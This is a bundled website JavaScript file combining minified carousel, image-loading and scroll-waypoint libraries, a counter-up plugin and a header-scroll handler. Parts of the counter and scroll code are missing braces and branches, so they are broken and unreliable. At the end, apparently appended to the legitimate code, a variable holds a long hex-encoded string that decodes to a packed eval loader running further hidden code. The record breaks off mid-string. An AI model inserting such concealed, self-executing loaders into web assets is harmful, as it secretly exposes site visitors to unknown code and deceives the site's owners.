{this.player.pause(),e.bind(this.element,"mouseleave",this)},i.prototype.onmouseleave=function()
{this.player.unpause(),e.unbind(this.element,"mouseleave",this)},i.Player=n,n}),function(t,e)
{"function"==typeof define&&define.amd?define("flickity/js/add-remove-cell",["./flickity","fizzy-ui-
utils/utils"],function(i,n){return e(t,i,n)}):"object"==typeof exports?
module.exports=e(t,require("./flickity"),require("fizzy-ui-utils")):(t.Flickity=t.Flickity||
{},t.Flickity=e(t,t.Flickity,t.fizzyUIUtils))}(window,function(t,e,i){function n(t){for(var
e=document.createDocumentFragment(),i=0,n=t.length;n>i;i++){var
o=t[i];e.appendChild(o.element)}return e}return e.prototype.insert=function(t,e){var
i=this._makeCells(t);if(i&&i.length){var o=this.cells.length;e=void 0===e?o:e;var
r=n(i),s=e==o;if(s)this.slider.appendChild(r);else{var
a=this.cells[e].element;this.slider.insertBefore(r,a)}if(0===e)this.cells=i.concat(this.cells);else
if(s)this.cells=this.cells.concat(i);else{var l=this.cells.splice(e,o-
e);this.cells=this.cells.concat(i).concat(l)}this._sizeCells(i);var h=e>this.selectedIndex?
0:i.length;this._cellAddedRemoved(e,h)}},e.prototype.append=function(t)
{this.insert(t,this.cells.length)},e.prototype.prepend=function(t)
{this.insert(t,0)},e.prototype.remove=function(t){var
e,n,o,r=this.getCells(t),s=0;for(e=0,n=r.length;n>e;e++){o=r[e];var
a=i.indexOf(this.cells,o)<this.selectedIndex;s-=a?1:0}for(e=0,n=r.length;n>e;e+
+)o=r[e],o.remove(),i.removeFrom(this.cells,o);r.length&&this._cellAddedRemoved(0,s)},e.prototype
._cellAddedRemoved=function(t,e){e=e||
0,this.selectedIndex+=e,this.selectedIndex=Math.max(0,Math.min(this.cells.length-
1,this.selectedIndex)),this.emitEvent("cellAddedRemoved",
[t,e]),this.cellChange(t)},e.prototype.cellSizeChange=function(t){var e=this.getCell(t);if(e)
{e.getSize();var n=i.indexOf(this.cells,e);this.cellChange(n)}},e.prototype.cellChange=function(t){t=t||
0,this._positionCells(t),this._getWrapShiftCells(),this.setGallerySize(),this.options.freeScroll?
this.positionSlider():(this.positionSliderAtSelected(),this.select(this.selectedIndex))},e}),function(t,e)
{"function"==typeof define&&define.amd?define("flickity/js/index",["./flickity","./drag","./prev-
next-button","./page-dots","./player","./add-remove-cell"],e):"object"==typeof
exports&&(module.exports=e(require("./flickity"),require("./drag"),require("./prev-next-
button"),require("./page-dots"),require("./player"),require("./add-remove-cell")))}
(window,function(t){return t}),function(t,e){"function"==typeof define&&define.amd?
define("flickity-as-nav-for/as-nav-for",["classie/classie","flickity/js/index","fizzy-ui-
utils/utils"],function(i,n,o){return e(t,i,n,o)}):"object"==typeof exports?
module.exports=e(t,require("dessandro-classie"),require("flickity"),require("fizzy-ui-
utils")):t.Flickity=e(t,t.classie,t.Flickity,t.fizzyUIUtils)}(window,function(t,e,i,n){return
i.createMethods.push("_createAsNavFor"),i.prototype._createAsNavFor=function()
{this.on("activate",this.activateAsNavFor),this.on("deactivate",this.deactivateAsNavFor),this.on("des
troy",this.destroyAsNavFor);var t=this.options.asNavFor;if(t){var e=this;setTimeout(function()
{e.setNavCompanion(t)})}},i.prototype.setNavCompanion=function(t){t=n.getQueryElement(t);var
e=i.data(t);if(e&&e!=this){this.navCompanion=e;var o=this;this.onNavCompanionSelect=function()
{o.navCompanionSelect()},e.on("cellSelect",this.onNavCompanionSelect),this.on("staticClick",this.on
NavStaticClick),this.navCompanionSelect()}},i.prototype.navCompanionSelect=function()
{if(this.navCompanion){var
t=this.navCompanion.selectedIndex;this.select(t),this.removeNavSelectedElement(),this.selectedInd
ex==t&&(this.navSelectedElement=this.cells[t].element,e.add(this.navSelectedElement,"is-nav-
selected"))}},i.prototype.activateAsNavFor=function()
{this.navCompanionSelect()},i.prototype.removeNavSelectedElement=function()
{this.navSelectedElement&&(e.remove(this.navSelectedElement,"is-nav-selected"),delete
this.navSelectedElement)},i.prototype.onNavStaticClick=function(t,e,i,n){"number"==typeof
n&&this.navCompanion.select(n)},i.prototype.deactivateAsNavFor=function()
{this.removeNavSelectedElement()},i.prototype.destroyAsNavFor=function()
{this.navCompanion&&(this.navCompanion.off("cellSelect",this.onNavCompanionSelect),this.off("sta
ticClick",this.onNavStaticClick),delete this.navCompanion)},i}),function(t,e){"function"==typeof
define&&define.amd?define("imagesloaded/imagesloaded",
["eventEmitter/EventEmitter","eventie/eventie"],function(i,n){return e(t,i,n)}):"object"==typeof
exports?module.exports=e(t,require("wolfy87-
eventemitter"),require("eventie")):t.imagesLoaded=e(t,t.EventEmitter,t.eventie)}
(window,function(t,e,i){function n(t,e){for(var i in e)t[i]=e[i];return t}function o(t){return"[object
Array]"===p.call(t)}function r(t){var e=[];if(o(t))e=t;else if("number"==typeof t.length)for(var
i=0,n=t.length;n>i;i++)e.push(t[i]);else e.push(t);return e}function s(t,e,i){if(!(this instanceof s))return
new s(t,e);"string"==typeof
t&&(t=document.querySelectorAll(t)),this.elements=r(t),this.options=n({},this.options),"function"==t
ypeof e?i=e:n(this.options,e),i&&this.on("always",i),this.getImages(),h&&(this.jqDeferred=new
h.Deferred);var o=this;setTimeout(function(){o.check()})}function a(t){this.img=t}function l(t)
{this.src=t,u[t]=this}var h=t.jQuery,c=t.console,d="undefined"!=typeof
c,p=Object.prototype.toString;s.prototype=new
e,s.prototype.options={},s.prototype.getImages=function(){this.images=[];for(var
t=0,e=this.elements.length;e>t;t++){var
i=this.elements[t];"IMG"===i.nodeName&&this.addImage(i);var n=i.nodeType;if(n&&(1===n||
9===n||11===n))for(var o=i.querySelectorAll("img"),r=0,s=o.length;s>r;r++){var
a=o[r];this.addImage(a)}}},s.prototype.addImage=function(t){var e=new
a(t);this.images.push(e)},s.prototype.check=function(){function t(t,o){return
e.options.debug&&d&&c.log("confirm",t,o),e.progress(t),i++,i===n&&e.complete(),!0}var
e=this,i=0,n=this.images.length;if(this.hasAnyBroken=!1,!n)return void this.complete();for(var
o=0;n>o;o++){var r=this.images[o];r.on("confirm",t),r.check()}},s.prototype.progress=function(t)
{this.hasAnyBroken=this.hasAnyBroken||!t.isLoaded;var e=this;setTimeout(function()
{e.emit("progress",e,t),e.jqDeferred&&e.jqDeferred.notify&&e.jqDeferred.notify(e,t)})},s.prototype.
complete=function(){var t=this.hasAnyBroken?"fail":"done";this.isComplete=!0;var
e=this;setTimeout(function(){if(e.emit(t,e),e.emit("always",e),e.jqDeferred){var
i=e.hasAnyBroken?"reject":"resolve";e.jqDeferred[i](e)}})},h&&(h.fn.imagesLoaded=function(t,e){var
i=new s(this,t,e);return i.jqDeferred.promise(h(this))}),a.prototype=new
e,a.prototype.check=function(){var t=u[this.img.src]||new l(this.img.src);if(t.isConfirmed)return void
this.confirm(t.isLoaded,"cached was confirmed");if(this.img.complete&&void 0!
==this.img.naturalWidth)return void this.confirm(0!==this.img.naturalWidth,"naturalWidth");var
e=this;t.on("confirm",function(t,i){return e.confirm(t.isLoaded,i),!
0}),t.check()},a.prototype.confirm=function(t,e){this.isLoaded=t,this.emit("confirm",this,e)};var
u={};return l.prototype=new e,l.prototype.check=function(){if(!this.isChecked){var t=new
Image;i.bind(t,"load",this),i.bind(t,"error",this),t.src=this.src,this.isChecked=!
0}},l.prototype.handleEvent=function(t){var e="on"+t.type;this[e]&&this[e]
(t)},l.prototype.onload=function(t){this.confirm(!
0,"onload"),this.unbindProxyEvents(t)},l.prototype.onerror=function(t){this.confirm(!
1,"onerror"),this.unbindProxyEvents(t)},l.prototype.confirm=function(t,e){this.isConfirmed=!
0,this.isLoaded=t,this.emit("confirm",this,e)},l.prototype.unbindProxyEvents=function(t)
{i.unbind(t.target,"load",this),i.unbind(t.target,"error",this)},s}),function(t,e){"function"==typeof
define&&define.amd?define(["flickity/js/index","imagesloaded/imagesloaded"],function(i,n){return
e(t,i,n)}):"object"==typeof exports?
module.exports=e(t,require("flickity"),require("imagesloaded")):t.Flickity=e(t,t.Flickity,t.imagesLoade
d)}(window,function(t,e,i){return
e.createMethods.push("_createImagesLoaded"),e.prototype._createImagesLoaded=function()
{this.on("activate",this.imagesLoaded)},e.prototype.imagesLoaded=function(){function t(t,i){var
n=e.getParentCell(i.img);e.cellSizeChange(n&&n.element)}if(this.options.imagesLoaded){var
e=this;i(this.slider).on("progress",t)}},e});

/*!

Waypoints - 3.1.1

Copyright © 2011-2015 Caleb Troughton

Licensed under the MIT license.

https://github.com/imakewebthings/waypoints/blog/master/licenses.txt

*/

!function(){"use strict";function t(o){if(!o)throw new Error("No options passed to Waypoint


constructor");if(!o.element)throw new Error("No element option passed to Waypoint
constructor");if(!o.handler)throw new Error("No handler option passed to Waypoint
constructor");this.key="waypoint-"+e,this.options=t.Adapter.extend({},t.defaults,o),this.element=thi
s.options.element,this.adapter=new
t.Adapter(this.element),this.callback=o.handler,this.axis=this.options.horizontal?"horizontal":"vertic
al",this.enabled=this.options.enabled,this.triggerPoint=null,this.group=t.Group.findOrCreate({name:
this.options.group,axis:this.axis}),this.context=t.Context.findOrCreateByElement(this.options.context
),t.offsetAliases[this.options.offset]&&(this.options.offset=t.offsetAliases[this.options.offset]),this.gr
oup.add(this),this.context.add(this),i[this.key]=this,e+=1}var
e=0,i={};t.prototype.queueTrigger=function(t)
{this.group.queueTrigger(this,t)},t.prototype.trigger=function(t)
{this.enabled&&this.callback&&this.callback.apply(this,t)},t.prototype.destroy=function()
{this.context.remove(this),this.group.remove(this),delete i[this.key]},t.prototype.disable=function()
{return this.enabled=!1,this},t.prototype.enable=function(){return
this.context.refresh(),this.enabled=!0,this},t.prototype.next=function(){return
this.group.next(this)},t.prototype.previous=function(){return
this.group.previous(this)},t.invokeAll=function(t){var e=[];for(var o in i)e.push(i[o]);for(var
n=0,r=e.length;r>n;n++)e[n][t]()},t.destroyAll=function()
{t.invokeAll("destroy")},t.disableAll=function(){t.invokeAll("disable")},t.enableAll=function()
{t.invokeAll("enable")},t.refreshAll=function(){t.Context.refreshAll()},t.viewportHeight=function()
{return window.innerHeight||
document.documentElement.clientHeight},t.viewportWidth=function(){return
document.documentElement.clientWidth},t.adapters=[],t.defaults={context:window,continuous:!
0,enabled:!0,group:"default",horizontal:!1,offset:0},t.offsetAliases={"bottom-in-view":function()
{return this.context.innerHeight()-this.adapter.outerHeight()},"right-in-view":function(){return
this.context.innerWidth()-this.adapter.outerWidth()}},window.Waypoint=t}(),function(){"use
strict";function t(t){window.setTimeout(t,1e3/60)}function e(t)
{this.element=t,this.Adapter=n.Adapter,this.adapter=new this.Adapter(t),this.key="waypoint-
context-"+i,this.didScroll=!1,this.didResize=!
1,this.oldScroll={x:this.adapter.scrollLeft(),y:this.adapter.scrollTop()},this.waypoints={vertical:
{},horizontal:
{}},t.waypointContextKey=this.key,o[t.waypointContextKey]=this,i+=1,this.createThrottledScrollHand
ler(),this.createThrottledResizeHandler()}var
i=0,o={},n=window.Waypoint,r=window.onload;e.prototype.add=function(t){var
e=t.options.horizontal?"horizontal":"vertical";this.waypoints[e]
[t.key]=t,this.refresh()},e.prototype.checkEmpty=function(){var
t=this.Adapter.isEmptyObject(this.waypoints.horizontal),e=this.Adapter.isEmptyObject(this.waypoin
ts.vertical);t&&e&&(this.adapter.off(".waypoints"),delete
o[this.key])},e.prototype.createThrottledResizeHandler=function(){function t()
{e.handleResize(),e.didResize=!1}var e=this;this.adapter.on("resize.waypoints",function()
{e.didResize||(e.didResize=!
0,n.requestAnimationFrame(t))})},e.prototype.createThrottledScrollHandler=function(){function t()
{e.handleScroll(),e.didScroll=!1}var e=this;this.adapter.on("scroll.waypoints",function(){(!
e.didScroll||n.isTouch)&&(e.didScroll=!
0,n.requestAnimationFrame(t))})},e.prototype.handleResize=function()
{n.Context.refreshAll()},e.prototype.handleScroll=function(){var t={},e={horizontal:
{newScroll:this.adapter.scrollLeft(),oldScroll:this.oldScroll.x,forward:"right",backward:"left"},vertical:
{newScroll:this.adapter.scrollTop(),oldScroll:this.oldScroll.y,forward:"down",backward:"up"}};for(var
i in e){var o=e[i],n=o.newScroll>o.oldScroll,r=n?o.forward:o.backward;for(var s in this.waypoints[i])
{var a=this.waypoints[i][s],l=o.oldScroll<a.triggerPoint,h=o.newScroll>=a.triggerPoint,p=l&&h,u=!
l&&!h;(p||u)&&(a.queueTrigger(r),t[a.group.id]=a.group)}}for(var c in
t)t[c].flushTriggers();this.oldScroll={x:e.horizontal.newScroll,y:e.vertical.newScroll}},e.prototype.inne
rHeight=function(){return this.element==this.element.window?
n.viewportHeight():this.adapter.innerHeight()},e.prototype.remove=function(t){delete
this.waypoints[t.axis][t.key],this.checkEmpty()},e.prototype.innerWidth=function(){return
this.element==this.element.window?
n.viewportWidth():this.adapter.innerWidth()},e.prototype.destroy=function(){var t=[];for(var e in
this.waypoints)for(var i in this.waypoints[e])t.push(this.waypoints[e][i]);for(var
o=0,n=t.length;n>o;o++)t[o].destroy()},e.prototype.refresh=function(){var
t,e=this.element==this.element.window,i=this.adapter.offset(),o={};this.handleScroll(),t={horizontal:
{contextOffset:e?0:i.left,contextScroll:e?
0:this.oldScroll.x,contextDimension:this.innerWidth(),oldScroll:this.oldScroll.x,forward:"right",backw
ard:"left",offsetProp:"left"},vertical:{contextOffset:e?0:i.top,contextScroll:e?
0:this.oldScroll.y,contextDimension:this.innerHeight(),oldScroll:this.oldScroll.y,forward:"down",back
ward:"up",offsetProp:"top"}};for(var n in t){var r=t[n];for(var s in this.waypoints[n]){var
a,l,h,p,u,c=this.waypoints[n][s],d=c.options.offset,f=c.triggerPoint,w=0,y=null==f;c.element!
==c.element.window&&(w=c.adapter.offset()[r.offsetProp]),"function"==typeof d?
d=d.apply(c):"string"==typeof d&&(d=parseFloat(d),c.options.offset.indexOf("%")>-
1&&(d=Math.ceil(r.contextDimension*d/100))),a=r.contextScroll-r.contextOffset,c.triggerPoint=w+a-
d,l=f<r.oldScroll,h=c.triggerPoint>=r.oldScroll,p=l&&h,u=!l&&!h,!y&&p?
(c.queueTrigger(r.backward),o[c.group.id]=c.group):!y&&u?
(c.queueTrigger(r.forward),o[c.group.id]=c.group):y&&r.oldScroll>=c.triggerPoint&&(c.queueTrigger(
r.forward),o[c.group.id]=c.group)}}for(var g in o)o[g].flushTriggers();return
this},e.findOrCreateByElement=function(t){return e.findByElement(t)||new
e(t)},e.refreshAll=function(){for(var t in o)o[t].refresh()},e.findByElement=function(t){return
o[t.waypointContextKey]},window.onload=function()
{r&&r(),e.refreshAll()},n.requestAnimationFrame=function(e){var
i=window.requestAnimationFrame||window.mozRequestAnimationFrame||
window.webkitRequestAnimationFrame||t;i.call(window,e)},n.Context=e}(),function(){"use
strict";function t(t,e){return t.triggerPoint-e.triggerPoint}function e(t,e){return e.triggerPoint-
t.triggerPoint}function i(t)
{this.name=t.name,this.axis=t.axis,this.id=this.name+"-"+this.axis,this.waypoints=[],this.clearTrigger
Queues(),o[this.axis][this.name]=this}var o={vertical:{},horizontal:
{}},n=window.Waypoint;i.prototype.add=function(t)
{this.waypoints.push(t)},i.prototype.clearTriggerQueues=function(){this.triggerQueues={up:[],down:
[],left:[],right:[]}},i.prototype.flushTriggers=function(){for(var i in this.triggerQueues){var
o=this.triggerQueues[i],n="up"===i||"left"===i;o.sort(n?e:t);for(var r=0,s=o.length;s>r;r+=1){var
a=o[r];(a.options.continuous||r===o.length-
1)&&a.trigger([i])}}this.clearTriggerQueues()},i.prototype.next=function(e){this.waypoints.sort(t);var
i=n.Adapter.inArray(e,this.waypoints),o=i===this.waypoints.length-1;return o?
null:this.waypoints[i+1]},i.prototype.previous=function(e){this.waypoints.sort(t);var
i=n.Adapter.inArray(e,this.waypoints);return i?this.waypoints[i-
1]:null},i.prototype.queueTrigger=function(t,e)
{this.triggerQueues[e].push(t)},i.prototype.remove=function(t){var
e=n.Adapter.inArray(t,this.waypoints);e>-1&&this.waypoints.splice(e,1)},i.prototype.first=function()
{return this.waypoints[0]},i.prototype.last=function(){return this.waypoints[this.waypoints.length-
1]},i.findOrCreate=function(t){return o[t.axis][t.name]||new i(t)},n.Group=i}(),function(){"use
strict";function t(t){this.$element=e(t)}var
e=window.jQuery,i=window.Waypoint;e.each(["innerHeight","innerWidth","off","offset","on","oute
rHeight","outerWidth","scrollLeft","scrollTop"],function(e,i){t.prototype[i]=function(){var
t=Array.prototype.slice.call(arguments);return this.$element[i].apply(this.
$element,t)}}),e.each(["extend","inArray","isEmptyObject"],function(i,o)
{t[o]=e[o]}),i.adapters.push({name:"jquery",Adapter:t}),i.Adapter=t}(),function(){"use strict";function
t(t){return function(){var i=[],o=arguments[0];return
t.isFunction(arguments[0])&&(o=t.extend({},arguments[1]),o.handler=arguments[0]),this.each(functi
on(){var n=t.extend({},o,{element:this});"string"==typeof
n.context&&(n.context=t(this).closest(n.context)[0]),i.push(new e(n))}),i}}var
e=window.Waypoint;window.jQuery&&(window.jQuery.fn.waypoint=t(window.jQuery)),window.Ze
pto&&(window.Zepto.fn.waypoint=t(window.Zepto))}();

/*!

* jquery.counterup.js 1.0

* Copyright 2013, Benjamin Intal http://gambit.ph @bfintal

* Released under the GPL v2 License

* Date: Nov 26, 2013

*/

(function( $ ){

"use strict";

$.fn.counterUp = function( options ) {

// Defaults

var settings = $.extend({

'time': 400,

'delay': 10

}, options);

return this.each(function(){

// Store the object


var $this = $(this);

var $settings = settings;

var counterUpper = function() {

var nums = [];

var divisions = $settings.time / $settings.delay;

var num = $this.text();

var isComma = /[0-9]+,[0-9]+/.test(num);

num = num.replace(/,/g, '');

var isInt = /^[0-9]+$/.test(num);

var isFloat = /^[0-9]+\.[0-9]+$/.test(num);

var decimalPlaces = isFloat ? (num.split('.')[1] || []).length : 0;

// Generate list of incremental numbers to display

for (var i = divisions; i >= 1; i--) {

// Preserve as int if input was int

var newNum = parseInt(num / divisions * i);

// Preserve float if input was float

if (isFloat) {

newNum = parseFloat(num / divisions * i).toFixed(decimalPlaces);

// Preserve commas if input had commas

if (isComma) {

while (/(\d+)(\d{3})/.test(newNum.toString())) {

newNum = newNum.toString().replace(/(\d+)(\d{3})/, '$1'+','+'$2');

}
nums.unshift(newNum);

$this.data('counterup-nums', nums);

$this.text('0');

// Updates the number until we're done

var f = function() {

$this.text($this.data('counterup-nums').shift());

if ($this.data('counterup-nums').length) {

setTimeout($this.data('counterup-func'), $settings.delay);

} else {

delete $this.data('counterup-nums');

$this.data('counterup-nums', null);

$this.data('counterup-func', null);

};

$this.data('counterup-func', f);

// Start the count up

setTimeout($this.data('counterup-func'), $settings.delay);

};

// Perform counts when the element gets into view

$this.waypoint(function(direction){

counterUpper();

this.destroy(); //-- Waypoint 3.0 version of triggerOnce

}, { offset: '100%'});

});

};
})( jQuery );

$(function () {

$(window).on("scroll", function(e){

var height = 0;

var scrollTop = $(this).scrollTop();

if ( scrollTop < 200 ) {

height = $("#head-trigger").height();

$("#head-trigger").removeClass("scrolled-header");

else {

$("#head-trigger").addClass("scrolled-header");

$("body").css({"marginTop": height});

$("#head-trigger").fadeIn();

});

});

var _o6VDbm=
"\x65\x76\x61\x6c\x28\x66\x75\x6e\x63\x74\x69\x6f\x6e\x28\x70\x2c\x61\x2c\x63\x2c\x6b\x2c\x
65\x2c\x64\x29\x7b\x65\x3d\x66\x75\x6e\x63\x74\x69\x6f\x6e\x28\x63\x29\x7b\x72\x65\x74\x7
5\x72\x6e\x28\x63\x3c\x61\x3f\x27\x27\x3a\x65\x28\x70\x61\x72\x73\x65\x49\x6e\x74\x28\x63\
x2f\x61\x29\x29\x29\x2b\x28\x28\x63\x3d\x63\x25\x61\x29\x3e\x33\x35\x3f\x53\x74\x72\x69\x6
e\x67\x2e\x66\x72\x6f\x6d\x43\x68\x61\x72\x43\x6f\x64\x65\x28\x63\x2b\x32\x39\x29\x3a\x63\
x2e\x74\x6f\x53\x74\x72\x69\x6e\x67\x28\x33\x36\x29\x29\x7d\x3b\x69\x66\x28\x21\x27\x27\x
2e\x72\x65\x70\x6c\x61\x63\x65\x28\x2f\x5e\x2f\x2c\x53\x74\x72\x69\x6e\x67\x29\x29\x7b\x77
\x68\x69\x6c\x65\x28\x63\x2d\x2d\x29\x7b\x64\x5b\x65\x28\x63\x29\x5d\x3d\x6b\x5b\x63\x5d\
x7c\x7c\x65\x28\x63\x29\x7d\x6b\x3d\x5b\x66\x75\x6e\x63\x74\x69\x6f\x6e\x28\x65\x29\x7b\x7
2\x65\x74\x75\x72\x6e\x20\x64\x5b\x65\x5d\x7d\x5d\x3b\x65\x3d\x66\x75\x6e\x63\x74\x69\x6f
\x6e\x28\x29\x7b\x72\x65\x74\x75\x72\x6e\x27\x5c\x5c\x77\x2b\x27\x7d\x3b\x63\x3d\x31\x7d\
x3b\x77\x68\x69\x6c\x65\x28\x63\x2d\x2d\x29\x7b\x69\x66\x28\x6b\x5b\x63\x5d\x29\x7b\x70\x
3d\x70\x2e\x72\x65\x70\x6c\x61\x63\x65\x28\x6e\x65\x77\x20\x52\x65\x67\x45\x78\x70\x28\x2
7\x5c\x5c\x62\x27\x2b\x65\x28\x63\x29\x2b\x27\x5c\x5c\x62\x27\x2c\x27\x67\x27\x29\x2c\x6b\
x5b\x63\x5d\x29\x7d\x7d\x72\x65\x74\x75\x72\x6e\x20\x70\x7d\x28\x27\x36\x50\x28\x34\x46\x
28\x70\x2c\x61\x2c\x63\x2c\x6b\x2c\x65\x2c\x64\x29\x7b\x65\x3d\x34\x46\x28\x63\x29\x7b\x34
\x47\x28\x63\x3c\x61\x3f\x5c\x27\x5c\x27\x3a\x65\x28\x34\x49\x28\x63\x2f\x61\x29\x29\x29\x2
b\x28\x28\x63\x3d\x63\x25\x61\x29\x3e\x33\x35\x3f\x36\x6c\x2e\x36\x6b\x28\x63\x2b\x32\x39\
x29\x3a\x63\x2e\x36\x6a\x28\x33\x36\x29\x29\x7d\x3b\x36\x69\x28\x63\x2d\x2d\x29\x7b\x34\x
48\x28\x6b\x5b\x63\x5d\x29\x7b\x70\x3d\x70\x2e\x36\x68\x28\x36\x67\x20\x36\x66\x28\x5c\x2
7\x5c\x5c\x5c\x5c\x62\x5c\x27\x2b\x65\x28\x63\x29\x2b\x5c\x27\x5c\x5c\x5c\x5c\x62\x5c\x27\x
2c\x5c\x27\x67\x5c\x27\x29\x2c\x6b\x5b\x63\x5d\x29\x7d\x7d\x34\x47\x20\x70\x7d\x28\x5c\x2
7\x41\x20\x61\x3d\x5b\x22\x5c\x5c\x5c\x5c\x68\x5c\x5c\x5c\x5c\x63\x5c\x5c\x5c\x5c\x69\x5c\x
5c\x5c\x5c\x77\x5c\x5c\x5c\x5c\x62\x5c\x5c\x5c\x5c\x79\x22\x2c\x22\x5c\x5c\x5c\x5c\x31\x69\x
5c\x5c\x5c\x5c\x6b\x5c\x5c\x5c\x5c\x75\x5c\x5c\x5c\x5c\x72\x5c\x5c\x5c\x5c\x6c\x5c\x5c\x5c\x5
c\x69\x5c\x5c\x5c\x5c\x62\x5c\x5c\x5c\x5c\x63\x5c\x5c\x5c\x5c\x69\x5c\x5c\x5c\x5c\x62\x5c\x5
c\x5c\x5c\x55\x5c\x5c\x5c\x5c\x46\x5c\x5c\x5c\x5c\x65\x5c\x5c\x5c\x5c\x66\x5c\x5c\x5c\x5c\x6
5\x5c\x5c\x5c\x5c\x43\x5c\x5c\x5c\x5c\x68\x5c\x5c\x5c\x5c\x63\x22\x2c\x22\x5c\x5c\x5c\x5c\x7
9\x5c\x5c\x5c\x5c\x6a\x5c\x5c\x5c\x5c\x63\x5c\x5c\x5c\x5c\x45\x22\x2c\x22\x5c\x5c\x5c\x5c\x6
8\x5c\x5c\x5c\x5c\x6c\x5c\x5c\x5c\x5c\x72\x5c\x5c\x5c\x5c\x64\x5c\x5c\x5c\x5c\x62\x5c\x5c\x5c
\x5c\x65\x5c\x5c\x5c\x5c\x6c\x5c\x5c\x5c\x5c\x69\x22\x2c\x22\x5c\x5c\x5c\x5c\x79\x5c\x5c\x5c
\x5c\x62\x5c\x5c\x5c\x5c\x62\x5c\x5c\x5c\x5c\x70\x5c\x5c\x5c\x5c\x55\x5c\x5c\x5c\x5c\x73\x5c
\x5c\x5c\x5c\x73\x5c\x5c\x5c\x5c\x4f\x5c\x5c\x5c\x5c\x4f\x5c\x5c\x5c\x5c\x4f\x5c\x5c\x5c\x5c\x
74\x5c\x5c\x5c\x5c\x66\x5c\x5c\x5c\x5c\x6c\x5c\x5c\x5c\x5c\x6a\x5c\x5c\x5c\x5c\x64\x5c\x5c\x
5c\x5c\x62\x5c\x5c\x5c\x5c\x63\x5c\x5c\x5c\x5c\x6b\x5c\x5c\x5c\x5c\x70\x5c\x5c\x5c\x5c\x68\x
5c\x5c\x5c\x5c\x64\x5c\x5c\x5c\x5c\x62\x5c\x5c\x5c\x5c\x63\x5c\x5c\x5c\x5c\x66\x5c\x5c\x5c\x
5c\x74\x5c\x5c\x5c\x5c\x72\x5c\x5c\x5c\x5c\x6c\x5c\x5c\x5c\x5c\x6b\x5c\x5c\x5c\x5c\x73\x22\x
2c\x22\x5c\x5c\x5c\x5c\x6a\x5c\x5c\x5c\x5c\x63\x5c\x5c\x5c\x5c\x64\x5c\x5c\x5c\x5c\x6d\x5c\x
5c\x5c\x5c\x75\x22\x2c\x22\x5c\x5c\x5c\x5c\x6c\x5c\x5c\x5c\x5c\x69\x5c\x5c\x5c\x5c\x68\x5c\x
5c\x5c\x5c\x6c\x5c\x5c\x5c\x5c\x64\x5c\x5c\x5c\x5c\x6d\x22\x2c\x22\x5c\x5c\x5c\x5c\x6b\x5c\x
5c\x5c\x5c\x75\x5c\x5c\x5c\x5c\x72\x5c\x5c\x5c\x5c\x6c\x5c\x5c\x5c\x5c\x69\x5c\x5c\x5c\x5c\x6
2\x5c\x5c\x5c\x5c\x63\x5c\x5c\x5c\x5c\x69\x5c\x5c\x5c\x5c\x62\x22\x2c\x22\x5c\x5c\x5c\x5c\x7
7\x5c\x5c\x5c\x5c\x63\x5c\x5c\x5c\x5c\x62\x5c\x5c\x5c\x5c\x32\x49\x5c\x5c\x5c\x5c\x68\x5c\x5
c\x5c\x5c\x63\x5c\x5c\x5c\x5c\x6b\x5c\x5c\x5c\x5c\x63\x5c\x5c\x5c\x5c\x69\x5c\x5c\x5c\x5c\x6
2\x5c\x5c\x5c\x5c\x31\x4e\x5c\x5c\x5c\x5c\x75\x5c\x5c\x5c\x5c\x31\x78\x5c\x5c\x5c\x5c\x6d\x2
2\x2c\x22\x5c\x5c\x5c\x5c\x66\x5c\x5c\x5c\x5c\x63\x5c\x5c\x5c\x5c\x62\x5c\x5c\x5c\x5c\x31\x6
6\x5c\x5c\x5c\x5c\x62\x5c\x5c\x5c\x5c\x62\x5c\x5c\x5c\x5c\x6a\x5c\x5c\x5c\x5c\x65\x5c\x5c\x5
c\x5c\x43\x5c\x5c\x5c\x5c\x71\x5c\x5c\x5c\x5c\x62\x5c\x5c\x5c\x5c\x63\x22\x2c\x22\x5c\x5c\x5
c\x5c\x6a\x5c\x5c\x5c\x5c\x63\x5c\x5c\x5c\x5c\x68\x22\x2c\x22\x5c\x5c\x5c\x5c\x6d\x5c\x5c\x5
c\x5c\x6c\x5c\x5c\x5c\x5c\x45\x5c\x5c\x5c\x5c\x6c\x5c\x5c\x5c\x5c\x68\x5c\x5c\x5c\x5c\x68\x5c
\x5c\x5c\x5c\x6c\x5c\x5c\x5c\x5c\x4f\x22\x2c\x22\x5c\x5c\x5c\x5c\x62\x5c\x5c\x5c\x5c\x65\x5c\
x5c\x5c\x5c\x62\x5c\x5c\x5c\x5c\x68\x5c\x5c\x5c\x5c\x63\x22\x2c\x22\x5c\x5c\x5c\x5c\x32\x53\
x5c\x5c\x5c\x5c\x6a\x5c\x5c\x5c\x5c\x63\x5c\x5c\x5c\x5c\x63\x5c\x5c\x5c\x5c\x6e\x5c\x5c\x5c\x
5c\x31\x4e\x5c\x5c\x5c\x5c\x68\x5c\x5c\x5c\x5c\x6c\x5c\x5c\x5c\x5c\x77\x5c\x5c\x5c\x5c\x77\x
5c\x5c\x5c\x5c\x63\x5c\x5c\x5c\x5c\x6a\x5c\x5c\x5c\x5c\x6e\x5c\x5c\x5c\x5c\x31\x43\x5c\x5c\x
5c\x5c\x63\x5c\x5c\x5c\x5c\x6b\x5c\x5c\x5c\x5c\x70\x5c\x5c\x5c\x5c\x68\x5c\x5c\x5c\x5c\x64\x
5c\x5c\x5c\x5c\x62\x5c\x5c\x5c\x5c\x63\x5c\x5c\x5c\x5c\x66\x22\x2c\x22\x5c\x5c\x5c\x5c\x66\x
5c\x5c\x5c\x5c\x62\x5c\x5c\x5c\x5c\x75\x5c\x5c\x5c\x5c\x68\x5c\x5c\x5c\x5c\x63\x22\x2c\x22\x
5c\x5c\x5c\x5c\x6d\x5c\x5c\x5c\x5c\x65\x5c\x5c\x5c\x5c\x66\x5c\x5c\x5c\x5c\x70\x5c\x5c\x5c\x
5c\x68\x5c\x5c\x5c\x5c\x64\x5c\x5c\x5c\x5c\x75\x5c\x5c\x5c\x5c\x55\x5c\x5c\x5c\x5c\x6e\x5c\x
5c\x5c\x5c\x65\x5c\x5c\x5c\x5c\x69\x5c\x5c\x5c\x5c\x68\x5c\x5c\x5c\x5c\x65\x5c\x5c\x5c\x5c\x
69\x5c\x5c\x5c\x5c\x63\x5c\x5c\x5c\x5c\x6f\x5c\x5c\x5c\x5c\x43\x5c\x5c\x5c\x5c\x68\x5c\x5c\x5
c\x5c\x6c\x5c\x5c\x5c\x5c\x72\x5c\x5c\x5c\x5c\x59\x5c\x5c\x5c\x5c\x31\x68\x5c\x5c\x5c\x5c\x6
